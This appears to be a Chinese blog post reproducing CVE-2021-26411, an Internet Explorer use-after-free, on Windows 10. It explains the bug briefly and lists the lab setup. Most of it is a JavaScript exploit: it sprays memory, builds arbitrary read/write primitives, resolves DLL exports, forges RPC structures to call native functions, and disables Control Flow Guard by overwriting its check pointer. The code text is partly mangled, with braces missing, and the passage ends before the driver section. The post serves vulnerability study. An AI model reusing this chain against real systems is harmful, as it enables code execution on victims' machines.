windows 10下复现CVE-2021-26411漏洞




CVE-2021-26411复现,学习JavaScript之POC源码分析

概述

CVE-2021-26411 的成因:removeAttributeNode() 会触发属性对象 nodeValue 上的 valueOf 回调;回调期间手动调用 clearAttributes(),使 nodeValue 保存的 BSTR 被提前释放。回调返回后,代码没有重新检查 nodeValue 是否仍然有效就继续使用该对象,最终形成 UAF(Use After Free)。

参考分析链接

国内链接

CVE-2021-26411在野样本中利用RPC绕过CFG缓解技术的研究 (qq.com)

IE浏览器在野0Day CVE-2021-26411漏洞分析 (qq.com)

原作者链接

https://enki.co.kr/blog/2021/02/04/ie_0day.html

平台环境

Win10 1809 17763  ==》 下载地址:https://hellowindows.cn/

商业-批量版 64位 2019-09-17 发布

Windows 10 (business editions), version 1809 (updated Sept 2019) (x64) - DVD (Chinese-Simplified)

ED2K


文件:cn_windows_10_business_editions_version_1809_updated_sept_2019_x64_dvd_f873d037.iso  我是下载的这个版本复现
大小:5.07GB
SHA1:975f1b3acbeece56b5ad1526345a0657109f4043

 

VmWare 16.1.1 build-17801498

复现效果展示

 

POC源码(注意:下面的代码会在 IE 进程内获得任意地址读写并执行原生代码——弹出 calc.exe 并运行一段 shellcode,请只在与外网隔离的虚拟机中打开)

<!-- IE Double Free 1Day Poc -->
<!doctype html>
<html lang="zh-cmn-Hans">
<head>
<meta http-equiv="Cache-Control" content="no-cache">
</head>
<body>
<script language="javascript">

// 重复字符串
// Helper: return this string repeated `size` times. Installed on
// String.prototype because the spray below relies on '0'.repeat(...);
// presumably the target browser lacks a native implementation — confirm.
String.prototype.repeat = function (size) {
    var slots = Array(size + 1);
    return slots.join(String(this));
};

// Left-pad `str` with zeros to exactly four characters; longer inputs keep
// only their last four characters. Used to build %uXXXX escape sequences.
function pad0(str) {
    var padded = '0000' + str;
    return padded.substring(padded.length - 4);
}


// Access of Resource Using Incompatible Type (\'Type Confusion\')
// Create an attribute node whose string value is a copy of the bytes of the
// global `abf` ArrayBuffer (skipping its first four bytes and the last two).
// The 16-bit units are emitted as %uXXXX escapes and decoded with unescape()
// so the resulting string carries arbitrary code units. This is the
// controlled allocation used by the spray (see flush()).
function alloc1() {
    var view = new DataView(abf);
    var escaped = [];
    // Little-endian 16-bit units, two bytes per step.
    for (var off = 4; off < abf.byteLength - 2; off += 2) {
        escaped.push('%u' + pad0(view.getUint16(off, true).toString(16)));
    }
    var attr = document.createAttribute('alloc');
    attr.nodeValue = unescape(escaped.join(''));
    return attr;
}


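// Build a Scripting.Dictionary whose items() array is later assigned to an
// attribute value (hd0.nodeValue = alloc). Its slots carry `fake`, `arr` and
// a filler marker so their addresses can be recovered from the spray.
// IE-only: relies on ActiveXObject.
function alloc2() {
    var dic1 = new ActiveXObject('Scripting.Dictionary');
    var dic2 = new ActiveXObject('Scripting.Dictionary');
    dic2.add(0, 1);
    dic1.add(0, dic2.items());
    dic1.add(1, fake);
    dic1.add(2, arr);
    // Fill the remaining slots with a recognisable marker value. `i` was an
    // implicit global in the original; declared here so it no longer leaks
    // into page scope.
    for (var i = 3; i < 0x20010 / 0x10; ++i) {
        dic1.add(i, 0x12341234);
    }
    return dic1.items();
}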


// Copy the UTF-16 code units of `nv` into a fresh 0x20010-byte ArrayBuffer
// starting at byte offset 4 (the mirror image of what alloc1() reads from
// `abf`). Returns the new buffer.
function dump(nv) {
    var ab = new ArrayBuffer(0x20010);
    var view = new DataView(ab);
    var len = nv.length;
    for (var idx = 0; idx < len; ++idx) {
        view.setUint16(4 + idx * 2, nv.charCodeAt(idx), true);
    }
    return ab;
}


// 在原型对象上定义属性
// Plain record for one VARIANT-like slot: `type` is the VT_* tag and `value`
// the payload. Consumed by setData().
function Data(type, value) {
    var self = this;
    self.type = type;
    self.value = value;
}


// Store record `data` into slot `i` of the global `abf` buffer. Each slot is
// 16 bytes (four uint32 words): the type tag goes into word 0 and the value
// into word 2; words 1 and 3 are left untouched.
function setData(i, data) {
    var words = new Uint32Array(abf);
    var base = i * 4;
    words[base] = data.type;
    words[base + 2] = data.value;
}


// Re-run the spray step: hd1 receives a fresh alloc1() value, hd2's previous
// value is dropped, and hd2 becomes a clone of hd1.
function flush() {
    var fresh = new alloc1();
    hd1.nodeValue = fresh.nodeValue;
    hd2.nodeValue = 0;
    hd2 = hd1.cloneNode();
}


// 小端序读取
// Read an unsigned integer of `size` bits (8, 16 or 32) at `addr` through the
// global `god` DataView; 16- and 32-bit reads are little-endian. Any other
// size yields undefined.
function read(addr, size) {
    if (size === 8) return god.getUint8(addr);
    if (size === 16) return god.getUint16(addr, true);
    if (size === 32) return god.getUint32(addr, true);
}
    


// Write `value` as an unsigned integer of `size` bits (8, 16 or 32) at `addr`
// through the global `god` DataView; 16- and 32-bit writes are little-endian.
// Any other size is a no-op returning undefined.
function write(addr, value, size) {
    if (size === 8) return god.setUint8(addr, value);
    if (size === 16) return god.setUint16(addr, value, true);
    if (size === 32) return god.setUint32(addr, value, true);
}
    


// Copy the byte values in `data` (an array-like of numbers) to consecutive
// addresses starting at `addr`, one 8-bit write() per element.
function writeData(addr, data) {
    var n = data.length;
    for (var k = 0; k < n; ++k) {
        write(addr + k, data[k], 8);
    }
}


// Return the native address of `obj`: store it in slot 0 of the global `arr`
// and read back the 32-bit value at `pArr` (the address of that slot, as set
// up by the top-level code).
function addrOf(obj) {
    arr[0] = obj;
    var address = read(pArr, 32);
    return address;
}


// Case-insensitive string equality. Either argument may be a JS string or an
// address, in which case the NUL-terminated C string at that address is read
// with toStr() first.
function strcmp(str1, str2) {
    var a = typeof str1 === 'string' ? str1 : toStr(str1);
    var b = typeof str2 === 'string' ? str2 : toStr(str2);
    return a.toLowerCase() === b.toLowerCase();
}


// Copy `size` bytes from `src` to `dst`, one byte at a time through
// read()/write(). No overlap handling, like its namesake.
function memcpy(dst, src, size) {
    for (var k = 0; k < size; ++k) {
        var byte = read(src + k, 8);
        write(dst + k, byte, 8);
    }
}


// Read the NUL-terminated byte string at `addr` and return it as a JS string
// (each byte becomes one code unit; no charset decoding).
function toStr(addr) {
    var chars = [];
    for (var p = addr; ; ++p) {
        var c = read(p, 8);
        if (c === 0) break;
        chars.push(String.fromCharCode(c));
    }
    return chars.join('');
}


// Allocate a native buffer holding `str` as a NUL-terminated byte string
// (one byte per code unit, truncated to 8 bits by write()) and return its
// address. Extra arguments are ignored.
function newStr(str) {
    var n = str.length;
    var buffer = createArrayBuffer(n + 1);
    for (var k = 0; k < n; ++k) {
        write(buffer + k, str.charCodeAt(k), 8);
    }
    // Terminator.
    write(buffer + n, 0, 8);
    return buffer;
}

// PE文件相关操作函数
// Find the base address of the DLL called `name` that the module at `base`
// imports. Walks the import descriptor table (PE32 layout: e_lfanew at +60,
// import directory RVA at NT header +128, 20-byte IMAGE_IMPORT_DESCRIPTOR
// entries with Name at +12 and FirstThunk at +16), reads the first resolved
// IAT entry of the matching descriptor, and rounds that pointer down to a
// module base with getBase().
// NOTE(review): the loop never terminates if no descriptor name matches;
// `iat` is really the import-descriptor table, and `tmpValue` is unused.
function getDllBase(base, name) 
    var tmpValue = 0
    var index = 0
    // VA of the import descriptor table.
    var iat = base + read(base + read(base + 60, 32) + 128, 32)
    while (true) 
        // Name RVA of this descriptor; strcmp() reads the C string in memory.
        var offset = read(iat + index * 20 + 12, 32)
        if (strcmp(base + offset, name)) break
        index++
    
    // FirstThunk RVA; its first slot holds a function address inside the target DLL.
    var addr = read(iat + index * 20 + 16, 32)
    return getBase(read(base + addr, 32))


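// Round `addr` down to the base of the module that contains it: start at the
// enclosing 64 KiB boundary and step down 0x10000 at a time until both the
// MZ and PE signatures check out. Loops forever if no header is found.
function getBase(addr) {
    // `>>> 0` keeps the candidate unsigned: `&` alone yields a negative
    // number for addresses >= 0x80000000, which would break the reads below.
    var candidate = (addr & 0xffff0000) >>> 0;
    while (!(isMZ(candidate) && isPE(candidate))) {
        candidate -= 0x10000;
    }
    return candidate;
}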


// True when the 16-bit value at `addr` is the DOS header magic "MZ".
function isMZ(addr) {
    var magic = read(addr, 16);
    return magic === 0x5a4d;
}


// Check that a DOS header at `addr` leads to a valid "PE\0\0" signature.
// Returns the address of the NT headers on success, or null when e_lfanew is
// implausibly large (> 0x600) or the signature does not match.
function isPE(addr) {
    var ntOffset = read(addr + 60, 32);  // e_lfanew
    if (ntOffset > 0x600) return null;
    var ntHeader = addr + ntOffset;
    return read(ntHeader, 32) === 0x4550 ? ntHeader : null;
}


// Classify the host OS from navigator.appVersion: 100 for Windows 10, 81 for
// 8.1, 80 for 8, and 70 for anything else (the Win7 case createBase() keys
// on). Patterns are tested in order, so "Windows 8.1" wins over "Windows 8".
function winVer() {
    var appVersion = window.navigator.appVersion;
    var table = [
        [/(Windows 10.0|Windows NT 10.0)/, 100],
        [/(Windows 8.1|Windows NT 6.3)/, 81],
        [/(Windows 8|Windows NT 6.2)/, 80]
    ];
    for (var k = 0; k < table.length; ++k) {
        if (table[k][0].test(appVersion)) return table[k][1];
    }
    return 70;
}


// Allocate `size` bytes of native memory by creating an ArrayBuffer and
// returning the pointer stored at +0x1c of its object (presumably the backing
// store — confirm). The buffer is parked in the global `map` so it is not
// collected while native code still references it.
function createArrayBuffer(size) {
    var ab = new ArrayBuffer(size);
    var backing = read(addrOf(ab) + 0x1c, 32);
    map.set(backing, ab);
    return backing;
}


// Resolve the export `name` from the module based at `addr` by walking its
// export directory (PE32 layout: e_lfanew at +0x3c, export directory RVA at
// NT header +0x78; NumberOfNames at +0x18, AddressOfFunctions at +0x1c,
// AddressOfNames at +0x20, AddressOfNameOrdinals at +0x24). Names are
// compared case-insensitively via strcmp(). Returns the export's VA.
// NOTE(review): `i` outlives the loop through var hoisting; if no name
// matches, i == non and the ordinal read lands one entry past the array.
function getProcAddr(addr, name) 
    var eat = addr + read(addr + read(addr + 0x3c, 32) + 0x78, 32)
    var non = read(eat + 0x18, 32)
    var aof = addr + read(eat + 0x1c, 32)
    var aon = addr + read(eat + 0x20, 32)
    var aono = addr + read(eat + 0x24, 32)
    for (var i = 0; i < non; ++i) 
        var offset = read(aon + i * 4, 32)
        if (strcmp(addr + offset, name)) break
    
    // Ordinal of the matched name selects the entry in AddressOfFunctions.
    var offset = read(aono + i * 2, 16)
    return addr + read(aof + offset * 4, 32)


// Point the forged RPC dispatch table at `func`, so the next NdrServerCall2
// issued through `msg` dispatches to it. Follows
// msg -> RpcInterfaceInformation -> InterpreterInfo -> DispatchTable using
// the SymTab layouts declared below and overwrites the first slot.
function readyRpcCall(func) 
    var PRPC_CLIENT_INTERFACE_Buffer = _RPC_MESSAGE.get(msg, \'RpcInterfaceInformation\')
    var _MIDL_SERVER_INFO_Buffer = PRPC_CLIENT_INTERFACE.get(PRPC_CLIENT_INTERFACE_Buffer, \'InterpreterInfo\')
    var RPC_DISPATCH_TABLE_Buffer = _MIDL_SERVER_INFO_.get(_MIDL_SERVER_INFO_Buffer, \'DispatchTable\')
    write(RPC_DISPATCH_TABLE_Buffer, func, 32)


// Marshal `args` (numbers, written as consecutive uint32 — at most 12 fit)
// into a fresh 48-byte buffer and install it as msg's Buffer/BufferLength.
// RpcFlags is set to the same 0x1000 initRpc() uses; its meaning is not
// established in this file. Returns the buffer address so the caller can
// release it from `map` afterwards.
function setArgs(args) 
    var buffer = createArrayBuffer(48)
    for (var i = 0; i < args.length; ++i) 
        write(buffer + i * 4, args[i], 32)
    
    _RPC_MESSAGE.set(msg, \'Buffer\', buffer)
    _RPC_MESSAGE.set(msg, \'BufferLength\', 48)
    _RPC_MESSAGE.set(msg, \'RpcFlags\', 0x1000)
    return buffer


// Hand msg's current Buffer to the I_RpcFreeBuffer trampoline object
// (`rpcFree`, built by the rpcFree() function) and invoke it via call().
function callRpcFreeBufferImpl() {
    var buf = _RPC_MESSAGE.get(msg, 'Buffer');
    _RPC_MESSAGE.set(rpcFree, 'Buffer', buf);
    return call(rpcFree);
}


// Read the first dword of msg's Buffer (used as the call's result value by
// call2()) before releasing the buffer through callRpcFreeBufferImpl().
function callRpcFreeBuffer() {
    var buf = _RPC_MESSAGE.get(msg, 'Buffer');
    var firstDword = read(buf, 32);
    callRpcFreeBufferImpl();
    return firstDword;
}


// Invoke native `func` with `args` through the forged RPC dispatch path:
// install the target, marshal the arguments, fire the call via `msg`, drop
// the argument buffer from `map`, then free it and return the first dword
// left in it (presumably the callee's return value as written back by the
// stub — confirm).
function call2(func, args) 
    readyRpcCall(func)
    var buffer = setArgs(args)
    call(msg)
    map.delete(buffer)
    return callRpcFreeBuffer()


// Redirect the `xyz` attribute's native object pointer (slot +0x18, where
// `patt` normally lives) to the fake object at `addr`, call xyz.normalize()
// so mshtml dispatches through the fake vtable's `normalize` slot, then
// restore the real pointer. If the dispatch throws, the error's `number` is
// returned as the result; otherwise 0.
function call(addr) 
    var result = 0
    write(paoi + 0x18, addr, 32)
    // The native call may surface as a script error; capture its code.
    try 
        // rpcrt4!NdrServerCall2
        xyz.normalize()
     catch (error) 
        result = error.number
    
    // Always restore the original object pointer.
    write(paoi + 0x18, patt, 32)
    return result


// Build a fake native attribute object at `addr` whose `normalize` vtable
// entry is `func`: copy the real object (`patt`, cbase.size() bytes) to
// `addr`, copy its vtable into a fresh buffer, point the fake's pvftable at
// that copy, and overwrite the copy's `normalize` slot.
function prepareCall(addr, func) 
    var buf = createArrayBuffer(cattr.size())
    var vft = read(patt, 32)
    memcpy(addr, patt, cbase.size())
    memcpy(buf, vft, cattr.size())
    cbase.set(addr, \'pvftable\', buf)
    cattr.set(buf, \'normalize\', func)


// Allocate the scaffold object used by aos(): `size` bytes (560 on Win7,
// 572 otherwise) plus room for a cbase copy, with a pointer at `offset`
// (540 / 548) to a 48-byte secondary buffer whose dwords at +36 and +40 are
// set to 8. What these offsets correspond to is not established in this
// file (version-specific internal layout — see the referenced analyses).
// Returns { size, addr }.
function createBase() 
    var isWin7 = winVer() == 70
    var size = isWin7 ? 560 : 572
    var offset = isWin7 ? 540 : 548
    var addr1 = createArrayBuffer(size + cbase.size())
    var addr2 = createArrayBuffer(48)
    write(addr1 + offset, addr2, 32)
    write(addr2 + 40, 8, 32)
    write(addr2 + 36, 8, 32)
    return 
        size: size,
        addr: addr1
    
    


// Obtain the value later used as `osf_vft` (presumably an rpcrt4 OSF
// connection vtable — confirm): call rpcrt4!I_RpcTransServerNewConnection on
// a fake object placed right after the createBase() scaffold, then follow
// two pointers from (result - 0xf8). The exact structure walked here is not
// established in this file.
function aos() 
    var baseObj = createBase()
    var addr = baseObj.addr + baseObj.size
    var I_RpcTransServerNewConnection = getProcAddr(rpcrt4, \'I_RpcTransServerNewConnection\')
    prepareCall(addr, I_RpcTransServerNewConnection)
    return read(read(call(addr)-0xf8, 32), 32)


// 自定义结构体的操作
// Tiny struct descriptor: `size` is the struct's byte size and `sym` maps a
// field name to { offset, size } (size in bits, as read()/write() expect).
// get()/set() access field `name` of the struct instance at `addr`.
function SymTab(size, sym) {
    function field(name) {
        return sym[name];
    }
    this.size = function () {
        return size;
    };
    this.set = function (addr, name, value) {
        var f = field(name);
        write(addr + f.offset, value, f.size);
    };
    this.get = function (addr, name) {
        var f = field(name);
        return read(addr + f.offset, f.size);
    };
}


// 构造RPC
// Construct the forged RPC_MESSAGE (`msg`) and the chain of structures
// NdrServerCall2 expects behind it — client interface, MIDL server info,
// stub descriptor, dispatch table and a hand-built proc format string — so
// that call() on the returned object makes rpcrt4 dispatch an arbitrary
// function with caller-supplied arguments. Returns the address of the fake
// message object. Field layouts come from the SymTab instances below;
// magic constants (0x89abcdef, Version/MIDLVersion, Flags 0x4000000,
// RpcFlags 0x1000, DataRepresentation 16) are taken from the original PoC
// and are not explained in this file.
function initRpc() 
    // NDR proc format string describing the server routine (12 DWORD params
    // + return). Opaque bytes copied from the original PoC.
    var data = [50,72,0,0,0,0,0,0,52,0,192,0,16,0,68,13,10,1,0,0,0,0,0,0,0,0,72,0,0,0,9,0,72,0,4,0,9,0,72,0,8,0,9,0,72,0,12,0,9,0,72,0,16,0,9,0,72,0,20,0,9,0,72,0,24,0,9,0,72,0,28,0,9,0,72,0,32,0,9,0,72,0,36,0,9,0,72,0,40,0,9,0,72,0,44,0,9,0,112,0,48,0,9,0,0]
    var NdrServerCall2 = getProcAddr(rpcrt4, \'NdrServerCall2\')
    var NdrOleAllocate = getProcAddr(rpcrt4, \'NdrOleAllocate\')
    var NdrOleFree = getProcAddr(rpcrt4, \'NdrOleFree\')
    var RPCMessageObject = createArrayBuffer(cbase.size())
    var buffer = createArrayBuffer(0x100)
    var buffer2 = createArrayBuffer(0x200)
    var AttributeVtable = read(patt, 32)
    var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
    var TransferSyntaxBuffer = createArrayBuffer(syntaxObject.size())
    var PRPC_CLIENT_INTERFACE_Buffer = createArrayBuffer(PRPC_CLIENT_INTERFACE.size())
    var _MIDL_SERVER_INFO_Buffer = createArrayBuffer(_MIDL_SERVER_INFO_.size())
    var rpcProcStringBuffer = createArrayBuffer(data.length)
    writeData(rpcProcStringBuffer, data)
    var _MIDL_STUB_DESC_Buffer = createArrayBuffer(_MIDL_STUB_DESC.size())
    var RPC_DISPATCH_TABLE_Buffer = createArrayBuffer(RPC_DISPATCH_TABLE.size())
    var NdrServerCall2Buffer = createArrayBuffer(4)
    write(NdrServerCall2Buffer, NdrServerCall2, 32)
    // Fake vtable for the message object: osf_vft first, then the slots
    // mshtml checks are cloned from the real attribute vtable, and
    // `normalize` is pointed at NdrServerCall2 so call(msg) lands there.
    write(MSHTMLSymbolBuffer, osf_vft, 32)
    write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
    write(MSHTMLSymbolBuffer + 8, 0x40, 32)
    cattr.set(MSHTMLSymbolBuffer, \'__vtguard\', cattr.get(AttributeVtable, \'__vtguard\'))
    cattr.set(MSHTMLSymbolBuffer, \'SecurityContext\', cattr.get(AttributeVtable, \'SecurityContext\'))
    cattr.set(MSHTMLSymbolBuffer, \'JSBind_InstanceOf\', cattr.get(AttributeVtable, \'JSBind_InstanceOf\'))
    cattr.set(MSHTMLSymbolBuffer, \'JSBind_TypeId\', cattr.get(AttributeVtable, \'JSBind_TypeId\'))
    cattr.set(MSHTMLSymbolBuffer, \'normalize\', NdrServerCall2)
    // pSecurityContext points inside the object itself (+68), with a 1 at +76.
    cbase.set(RPCMessageObject, \'pSecurityContext\', RPCMessageObject + 68)
    write(RPCMessageObject + 76, 1, 32)
    syntaxObject.set(TransferSyntaxBuffer, \'SyntaxVersion.MajorVersion\', 2)
    // MIDL_STUB_DESC: allocator/free hooks and the format-type table.
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'RpcInterfaceInformation\', PRPC_CLIENT_INTERFACE_Buffer)
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'pfnAllocate\', NdrOleAllocate)
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'pfnFree\', NdrOleFree)
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'pFormatTypes\', buffer2)
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'fCheckBounds\', 1)
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'Version\', 0x50002)
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'MIDLVersion\', 0x800025b)
    _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, \'mFlags\', 1)
    // MIDL_SERVER_INFO: stub descriptor, per-routine dispatch table
    // (rewritten by readyRpcCall()), proc string and format offsets.
    _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'pStubDesc\', _MIDL_STUB_DESC_Buffer)
    _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'DispatchTable\', createArrayBuffer(32))
    _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'ProcString\', rpcProcStringBuffer)
    _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, \'FmtStringOffset\', buffer2)
    // Interface-level dispatch table with a single entry: NdrServerCall2.
    RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, \'DispatchTableCount\', 1)
    RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, \'DispatchTable\', NdrServerCall2Buffer)
    PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'DispatchTable\', RPC_DISPATCH_TABLE_Buffer)
    PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'InterpreterInfo\', _MIDL_SERVER_INFO_Buffer)
    PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'Length\', PRPC_CLIENT_INTERFACE.size())
    PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'InterfaceId.SyntaxVersion.MajorVersion\', 1)
    PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'TransferSyntax.SyntaxVersion.MajorVersion\', 2)
    PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, \'Flags\', 0x4000000)
    // RPC_MESSAGE: Handle is the fake vtable object above; Buffer/BufferLength
    // are replaced per call by setArgs().
    _RPC_MESSAGE.set(RPCMessageObject, \'RpcInterfaceInformation\', PRPC_CLIENT_INTERFACE_Buffer)
    _RPC_MESSAGE.set(RPCMessageObject, \'TransferSyntax\', TransferSyntaxBuffer)
    _RPC_MESSAGE.set(RPCMessageObject, \'Handle\', MSHTMLSymbolBuffer)
    _RPC_MESSAGE.set(RPCMessageObject, \'DataRepresentation\', 16)
    _RPC_MESSAGE.set(RPCMessageObject, \'RpcFlags\', 0x1000)
    _RPC_MESSAGE.set(RPCMessageObject, \'Buffer\', buffer)
    _RPC_MESSAGE.set(RPCMessageObject, \'BufferLength\', 48)
    return RPCMessageObject


// Build a second fake native object whose vtable `normalize` slot is
// rpcrt4!I_RpcFreeBuffer, so call() on it frees whatever Buffer the
// caller installed (see callRpcFreeBufferImpl()). Mirrors the vtable setup
// in initRpc(). Returns the object's address; the top-level code assigns it
// to a variable of the same name, which replaces this function binding.
function rpcFree() 
    var Cbase = createArrayBuffer(cbase.size())
    var I_RpcFreeBuffer = getProcAddr(rpcrt4, \'I_RpcFreeBuffer\')
    var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
    var AttributeVtable = read(patt, 32)
    write(MSHTMLSymbolBuffer, osf_vft, 32)
    write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
    write(MSHTMLSymbolBuffer + 8, 64, 32)
    // Clone the vtable slots mshtml validates, then hijack `normalize`.
    cattr.set(MSHTMLSymbolBuffer, \'__vtguard\', cattr.get(AttributeVtable, \'__vtguard\'))
    cattr.set(MSHTMLSymbolBuffer, \'SecurityContext\', cattr.get(AttributeVtable, \'SecurityContext\'))
    cattr.set(MSHTMLSymbolBuffer, \'JSBind_InstanceOf\', cattr.get(AttributeVtable, \'JSBind_InstanceOf\'))
    cattr.set(MSHTMLSymbolBuffer, \'JSBind_TypeId\', cattr.get(AttributeVtable, \'JSBind_TypeId\'))
    cattr.set(MSHTMLSymbolBuffer, \'normalize\', I_RpcFreeBuffer)
    cbase.set(Cbase, \'pvftable\', MSHTMLSymbolBuffer)
    cbase.set(Cbase, \'pSecurityContext\', Cbase + 68)
    write(Cbase + 76, 1, 32)
    return Cbase


// Inspect the Control Flow Guard state of the module at `baseAddress`:
// locate IMAGE_LOAD_CONFIG_DIRECTORY via the data directory (NT header
// +0x78 is the first directory entry; +0x50 from there is the load-config
// entry) and read GuardCFCheckFunctionPointer at +72 (32-bit layout).
// getCFGAddress() returns the address of that pointer slot (0 when the
// directory is too small to contain it); getCFGValue() returns true when the
// pointer targets something outside the module image, i.e. a real check
// routine is installed rather than the in-image stub.
function CFGObject(baseAddress) 
    var PEAddr = isPE(baseAddress)
    var eat = PEAddr + 120
    var LOAD_CONFIG_DIRECTORY = baseAddress + read(eat + 0x50, 32)
    var size = read(LOAD_CONFIG_DIRECTORY, 32)
    var sizeOfImage = read(PEAddr + 0x50, 32)
    var CFGSymbolTable = new SymTab(0x5c, 
        \'___guard_check_icall_fptr\': 
            offset: 72,
            size: 32
        
    )

    // A load-config directory shorter than 0x5c predates the CFG fields.
    var guard_check_icall_fptr_address = size < CFGSymbolTable.size() ? 0 : CFGSymbolTable.get(LOAD_CONFIG_DIRECTORY, \'___guard_check_icall_fptr\')
    this.getCFGAddress = function() 
        return guard_check_icall_fptr_address
    
    this.getCFGValue = function() 
        if (size < CFGSymbolTable.size()) return false
        var currentCFGValue = read(guard_check_icall_fptr_address, 32)
        // Inside the image means the no-op stub; outside means CFG is live.
        var isValidAddress = (baseAddress < currentCFGValue) && (currentCFGValue < baseAddress + sizeOfImage)
        return !isValidAddress;
    


// Neutralise CFG for the module at `addr` (rpcrt4 in this PoC): if a real
// check routine is installed, make the __guard_check_icall_fptr slot
// writable with VirtualProtect, replace it with ntdll!KiFastSystemCallRet
// (which simply returns, so every indirect-call check passes), and restore
// the page protection. Does nothing when CFG is not active for the module.
function killCfg(addr) 
    var cfgobj = new CFGObject(addr)
    if (!cfgobj.getCFGValue()) return
    var guard_check_icall_fptr_address = cfgobj.getCFGAddress()
    var KiFastSystemCallRet = getProcAddr(ntdll, \'KiFastSystemCallRet\')
    var tmpBuffer = createArrayBuffer(4)
    // Make the page holding rpcrt4!__guard_check_icall_fptr PAGE_EXECUTE_READWRITE (0x40).
    call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, 0x40, tmpBuffer])
    // Swap the stored ntdll!LdrpValidateUserCallTarget pointer for
    // ntdll!KiFastSystemCallRet, disabling rpcrt4's CFG checks.
    write(guard_check_icall_fptr_address, KiFastSystemCallRet, 32)
    // Restore the original protection saved in tmpBuffer.
    call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, read(tmpBuffer, 32), tmpBuffer])
    map.delete(tmpBuffer)


//  表示对象
// 属性:属性值
// Struct layouts used by the exploit. Each SymTab lists a byte size and the
// fields it touches as { offset, size-in-bits }. The mshtml layouts (cbase,
// cattr) are specific to the targeted IE build; the RPC ones follow the
// public rpcrt4 structure definitions (32-bit).

// mshtml CBase-like object: vtable pointer and security-context pointer.
var cbase = new SymTab(0x60, 
    \'pvftable\': 
        offset: 0x0,
        size: 32
    ,
    \'pSecurityContext\': 
        offset: 0x44,
        size: 32
    
)

// Attribute vtable: the slots mshtml validates before dispatch plus the
// `normalize` slot the PoC hijacks.
var cattr = new SymTab(0x32c, 
    \'__vtguard\': 
        offset: 0x48,
        size: 32
    ,
    \'SecurityContext\': 
        offset: 0xc8,
        size: 32
    ,
    \'JSBind_TypeId\': 
        offset: 0x160,
        size: 32
    ,
    \'JSBind_InstanceOf\': 
        offset: 0x164,
        size: 32
    ,
    \'normalize\': 
        offset: 0x28c,
        size: 32
    
)

// RPC_SYNTAX_IDENTIFIER (GUID + version).
var syntaxObject = new SymTab(0x14, 
    \'SyntaxVersion.MajorVersion\': 
        offset: 0x10,
        size: 16
    
)

// RPC_CLIENT_INTERFACE / RPC_SERVER_INTERFACE.
var PRPC_CLIENT_INTERFACE = new SymTab(0x44, 
    \'Length\': 
        offset: 0,
        size: 32
    ,
    \'InterfaceId.SyntaxVersion.MajorVersion\': 
        offset: 20,
        size: 16
    ,
    \'TransferSyntax.SyntaxVersion.MajorVersion\': 
        offset: 40,
        size: 16
    ,
    // Pointer to the runtime/stub dispatch table.
    \'DispatchTable\': 
        offset: 44,
        size: 32
    ,
    // Pointer to the MIDL_SERVER_INFO structure.
    \'InterpreterInfo\': 
        offset: 60,
        size: 32
    ,
    \'Flags\': 
        offset: 64,
        size: 32
    
)

// MIDL_SERVER_INFO: server-side IDL interface description.
var _MIDL_SERVER_INFO_ = new SymTab(0x20, 
    \'pStubDesc\': 
        offset: 0,
        size: 32
    ,
    // Array of function pointers for the server's remote routines.
    \'DispatchTable\': 
        offset: 4,
        size: 32
    ,
    \'ProcString\': 
        offset: 8,
        size: 32
    ,
    \'FmtStringOffset\': 
        offset: 12,
        size: 32
    
)

// MIDL_STUB_DESC.
var _MIDL_STUB_DESC = new SymTab(0x50, 
    \'RpcInterfaceInformation\': 
        offset: 0,
        size: 32
    ,
    \'pfnAllocate\': 
        offset: 4,
        size: 32
    ,
    \'pfnFree\': 
        offset: 8,
        size: 32
    ,
    \'pFormatTypes\': 
        offset: 32,
        size: 32
    ,
    \'fCheckBounds\': 
        offset: 36,
        size: 32
    ,
    \'Version\': 
        offset: 40,
        size: 32
    ,
    \'MIDLVersion\': 
        offset: 48,
        size: 32
    ,
    \'mFlags\': 
        offset: 64,
        size: 32
    
)

// RPC_DISPATCH_TABLE.
var RPC_DISPATCH_TABLE = new SymTab(12, 
    \'DispatchTableCount\': 
        offset: 0,
        size: 32
    ,
    \'DispatchTable\': 
        offset: 4,
        size: 32
    ,
)

// RPC_MESSAGE.
var _RPC_MESSAGE = new SymTab(0x2c, 
    \'Handle\': 
        offset: 0,
        size: 32
    ,
    \'DataRepresentation\': 
        offset: 4,
        size: 32
    ,
    // Marshalled call arguments.
    \'Buffer\': 
        offset: 8,
        size: 32
    ,
    \'BufferLength\': 
        offset: 12,
        size: 32
    ,
    \'TransferSyntax\': 
        offset: 20,
        size: 32
    ,
    // Points to the RPC_SERVER_INTERFACE.
    \'RpcInterfaceInformation\': 
        offset: 24,
        size: 32
    ,
    \'RpcFlags\': 
        offset: 40,
        size: 32
    
)

// ---- Exploit driver -------------------------------------------------------
// 1. Trigger the UAF (removeAttributeNode -> valueOf -> clearAttributes) and
//    reclaim the freed BSTR with a controlled spray.
